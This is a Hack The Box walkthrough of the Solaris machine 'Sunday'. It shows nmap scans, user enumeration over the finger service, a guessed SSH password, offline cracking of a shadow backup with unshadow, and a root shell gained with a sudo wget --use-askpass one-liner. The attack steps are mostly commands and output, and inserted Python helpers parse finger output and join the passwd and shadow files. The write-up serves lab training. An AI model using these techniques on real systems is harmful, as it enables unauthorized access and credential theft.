#hackthebox #easy #linux #solaris #finger #SUID #wget
![[Pasted image 20250728221540.png]]
# Information Gathering - Nmap
A TCP scan against all ports revealed 5 open ports.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p- -oN tcpAll
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-29 01:11 UTC
Nmap scan report for 10.10.10.76
Host is up (0.048s latency).
Not shown: 63770 filtered tcp ports (no-response), 1760 closed tcp ports (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
79/tcp open finger
111/tcp open rpcbind
515/tcp open printer
6787/tcp open smc-admin
22022/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 43.67 seconds
```
Another TCP scan against the open ports.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 79,111,515,6787,22022
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-29 01:15 UTC
Nmap scan report for 10.10.10.76
Host is up (0.049s latency).
PORT STATE SERVICE VERSION
79/tcp open finger?
| fingerprint-strings:
| GenericLines:
| No one logged on
| GetRequest:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| HTTPOptions:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| OPTIONS ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
| RTSP/1.0 ???
| SSLSessionReq, TerminalServerCookie:
|_ Login Name TTY Idle When Where
|_finger: No one logged on\x0D
111/tcp open rpcbind 2-4 (RPC #100000)
515/tcp open printer
6787/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
22022/tcp open ssh OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:00:94:32:18:60:a4:93:3b:87:a4:b6:f8:02:68:0e (RSA)
|_ 256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port79-TCP:V=7.95%I=7%D=7/29%Time=688820C0%P=x86_64-pc-linux-gnu%r(Gene
<SNIP>
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.98 seconds
```
A UDP scan against the top 10 ports.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10 -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-29 01:18 UTC
Nmap scan report for 10.10.10.76
Host is up (0.050s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
161/udp closed snmp
445/udp closed microsoft-ds
631/udp closed ipp
1434/udp closed ms-sql-m
Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds
```
---
# Enumeration
##### Finger - TCP 79
It was my first time facing the `Finger` protocol. I had never heard of it until now. I didn't know how to approach it, so I headed to `hacktricks.wiki` and followed all the enumeration techniques listed there.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ finger @$IP
No one logged on
┌──(kali㉿kali)-[~/Desktop]
└─$ echo "root" | nc -nv $IP 79
(UNKNOWN) [10.10.10.76] 79 (finger) open
Login Name TTY Idle When Where
root Super-User ssh <Dec 7, 2023> 10.10.14.46
┌──(kali㉿kali)-[~/Desktop]
└─$ finger admin@$IP
Login Name TTY Idle When Where
adm Admin < . . . . >
dladm Datalink Admin < . . . . >
netadm Network Admin < . . . . >
netcfg Network Configuratio < . . . . >
dhcpserv DHCP Configuration A < . . . . >
ikeuser IKE Admin < . . . . >
lp Line Printer Admin < . . . . >
┌──(kali㉿kali)-[~/Desktop]
└─$ finger user@$IP
Login Name TTY Idle When Where
aiuser AI User < . . . . >
openldap OpenLDAP User < . . . . >
nobody NFS Anonymous Access < . . . . >
noaccess No Access User < . . . . >
nobody4 SunOS 4.x NFS Anonym < . . . . >
```
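To make clear what the `finger` service hands to an unauthenticated client, here is an added example (not part of the original write-up) that parses the `Login Name TTY Idle When Where` table shown above and reports which accounts leak a real session with its TTY and source address. The sample output is constructed from the replies above; the idle-column format is an assumption.

```python
"""Parse Solaris-style finger output and report what it discloses."""
import re
from typing import List, NamedTuple, Optional, Tuple

# Constructed from the finger replies shown in the write-up (columns collapsed).
FINGER_OUTPUT = """\
Login Name TTY Idle When Where
root Super-User ssh <Dec 7, 2023> 10.10.14.46
adm Admin < . . . . >
netcfg Network Configuratio < . . . . >
nobody NFS Anonymous Access < . . . . >
"""

NO_SESSION = "< . . . . >"  # Solaris placeholder for accounts that never logged in

# With whitespace collapsed a session row is "<name> <tty> [<idle>] <when> [<where>]".
# Assumption: the idle column, when present, is numeric (e.g. "12" or "1:04").
SESSION_RE = re.compile(
    r"^(?P<name>.*?) (?P<tty>\S+) (?:(?P<idle>\d[\d:]*) )?<(?P<when>[^>]+)>(?: (?P<where>\S+))?$"
)

class Entry(NamedTuple):
    login: str
    name: str
    tty: Optional[str]
    idle: Optional[str]
    when: Optional[str]
    where: Optional[str]

def parse_finger(output: str) -> List[Entry]:
    """Turn raw finger output into Entry records; header and empty lines are skipped."""
    entries = []
    for raw in output.splitlines():
        line = " ".join(raw.split())  # collapse the fixed-width columns
        if not line or line.startswith("Login ") or line == "No one logged on":
            continue
        login, _, rest = line.partition(" ")
        if rest.endswith(NO_SESSION):  # account exists but has no recorded login
            entries.append(Entry(login, rest[: -len(NO_SESSION)].strip(), None, None, None, None))
            continue
        m = SESSION_RE.match(rest)
        if m is None:
            raise ValueError(f"unrecognised finger line: {raw!r}")
        entries.append(Entry(login, m["name"], m["tty"], m["idle"], m["when"], m["where"]))
    return entries

def disclosed_sessions(entries: List[Entry]) -> List[Tuple[str, str, Optional[str]]]:
    """Accounts for which the service reveals a login: (login, tty, source address)."""
    return [(e.login, e.tty, e.where) for e in entries if e.tty is not None]
```

Every entry the parser returns is information the host volunteers to anyone on the network, which is why the usual fix is simply to disable the service.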
`hacktricks` also suggested `finger-user-enum.pl` from `Pentest Monkey`, which is a tool for enumerating OS-level user accounts via the finger service. I downloaded the tool on my Kali and ran it against the target IP address.
I found 16 entries, but the ones that caught my eye were `root`, `sammy`, and `sunny` because these appeared to be logged in over `SSH`.
![[Pasted image 20250728210653.png]]
I tried common CTF passwords like `admin` and `password` but failed. Then I thought to try the name of the box, which is `sunday`. It turned out the user `sunny`'s password is `sunday`.
![[Pasted image 20250728211846.png]]
# Initial Access - SSH 22022 (Shell as sunny)
I successfully logged in, but it didn't look like a typical SSH session. It displayed `Oracle Solaris`.
![[Pasted image 20250728212022.png]]
The `user.txt` file was in `/home/sammy`, but `sunny` doesn't have permission to read `sammy`'s files.
```bash
sunny@sunday:/home/sammy$ ls
user.txt
sunny@sunday:/home/sammy$ cat user.txt
cat: cannot open user.txt: Permission denied
```
# Lateral Movement - To `sammy`
I tried the `sudo -l` command to see whether our current user `sunny` could run any command with `sudo` privileges. There was one: `/root/troll`, but as the name suggests, I think its purpose was really to troll people, because I was not able to read it and executing it returned meaningless stuff haha.
```bash
sunny@sunday:/home/sammy$ sudo -l
User sunny may run the following commands on sunday:
(root) NOPASSWD: /root/troll
```
Then in the `/backup` directory I found 2 backup files.
![[Pasted image 20250728213852.png]]
Both files contained the same contents; I confirmed it with `diff`.
![[Pasted image 20250728214255.png]]
I'm not sure if it's a copy of the `/etc/shadow` file, but one of the files is named `shadow.backup`, so there's a high chance it's a copy of shadow. I'm going to grab `/etc/passwd` and try `unshadow` to retrieve their passwords.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ cat passwd2.txt && cat shadow2.txt
sammy:x:100:10::/home/sammy:/usr/bin/bash
sunny:x:101:10::/home/sunny:/usr/bin/bash
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
┌──(kali㉿kali)-[~/Desktop]
└─$ unshadow passwd2.txt shadow2.txt
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:100:10::/home/sammy:/usr/bin/bash
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:101:10::/home/sunny:/usr/bin/bash
┌──(kali㉿kali)-[~/Desktop]
└─$ unshadow passwd2.txt shadow2.txt > clear.txt
```
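As an added example (not from the write-up or from John the Ripper), the following reproduces what `unshadow` did above, putting each shadow hash into the password field of the matching `passwd` line, and labels the crypt(3) scheme of every hash so a defender can see what a readable `shadow.backup` actually exposes. The sample lines are the two accounts shown above; the scheme table is a general crypt(3) mapping, not something taken from the box.

```python
"""Reproduce the passwd/shadow join and classify what a leaked shadow exposes."""
from typing import Dict, List

# Constructed from the two accounts shown in the write-up.
PASSWD = """\
sammy:x:100:10::/home/sammy:/usr/bin/bash
sunny:x:101:10::/home/sunny:/usr/bin/bash
"""
SHADOW = """\
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""

# crypt(3) scheme identifiers found between the first two '$' of a hash.
SCHEMES = {"1": "MD5-crypt", "md5": "SunMD5", "2a": "bcrypt", "2b": "bcrypt",
           "5": "SHA-256-crypt", "6": "SHA-512-crypt", "y": "yescrypt"}

def hash_scheme(field: str) -> str:
    """Name the scheme of one shadow password field ("locked" if there is nothing to crack)."""
    if field in ("", "*", "NP", "*LK*") or field.startswith("!"):
        return "locked/no-password"
    if field.startswith("$"):
        return SCHEMES.get(field.split("$")[1], "unknown")
    return "DES-crypt" if len(field) == 13 else "unknown"

def unshadow(passwd: str, shadow: str) -> List[str]:
    """Put each shadow hash into the password field of the matching passwd line."""
    hashes: Dict[str, str] = {}
    for line in shadow.splitlines():
        if line and not line.startswith("#"):
            user, field = line.split(":", 2)[:2]   # hashes contain '$' but never ':'
            hashes[user] = field
    merged = []
    for line in passwd.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        fields[1] = hashes.get(fields[0], fields[1])   # keep 'x' if no shadow entry
        merged.append(":".join(fields))
    return merged

def exposure_report(passwd: str, shadow: str) -> Dict[str, str]:
    """Accounts whose hash the readable backup exposes, with its scheme; rotate these passwords."""
    report = {}
    for line in unshadow(passwd, shadow):
        user, field = line.split(":")[:2]
        if field != "x":
            report[user] = hash_scheme(field)
    return report
```

Anything the report lists is now crackable offline at the attacker's leisure, so a backup of `/etc/shadow` needs the same `root:root 0600` protection as the original.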
Got the passwords!
![[Pasted image 20250728220640.png]]
Logged in as `sammy`.
![[Pasted image 20250728220826.png]]
Got `user.txt`
```
bash-5.1$ cat user.txt
1371...
```
# Privilege Escalation - To `root`
`sudo -l` revealed that `sammy` can execute `wget` with root privileges. Judging by the name of the binary, I think this one is genuine; I hope I'm not getting trolled again.
```bash
bash-5.1$ sudo -l
User sammy may run the following commands on sunday:
(root) NOPASSWD: /usr/bin/wget
```
Successfully obtained a shell as `root`!
```bash
bash-5.1$ TF=$(mktemp)
chmod +x $TF
echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
sudo wget --use-askpass=$TF 0
root@sunday:/home/sammy# whoami
root
```
Got `root.txt`!
```bash
root@sunday:~# ls -l
total 8
-rw-r--r-- 1 root root 126 Dec 19 2021 overwrite
-rw------- 1 root root 33 Jul 29 01:03 root.txt
-rwxr-xr-x 1 root root 53 Jul 29 03:14 troll
-rw-r--r-- 1 root root 53 Dec 19 2021 troll.original
root@sunday:~# cat root.txt
0f1...
```
---
There's also the `troll` file haha. The `overwrite` script copies `troll.original` back over `/root/troll` every 5 seconds.
```bash
root@sunday:~# cat overwrite
#!/usr/bin/bash
while true; do
/usr/gnu/bin/cat /root/troll.original > /root/troll
/usr/gnu/bin/sleep 5
done
root@sunday:~# cat troll
#!/usr/bin/bash
/usr/bin/echo "testing"
/usr/bin/id
root@sunday:~# cat troll.original
#!/usr/bin/bash
/usr/bin/echo "testing"
/usr/bin/id
```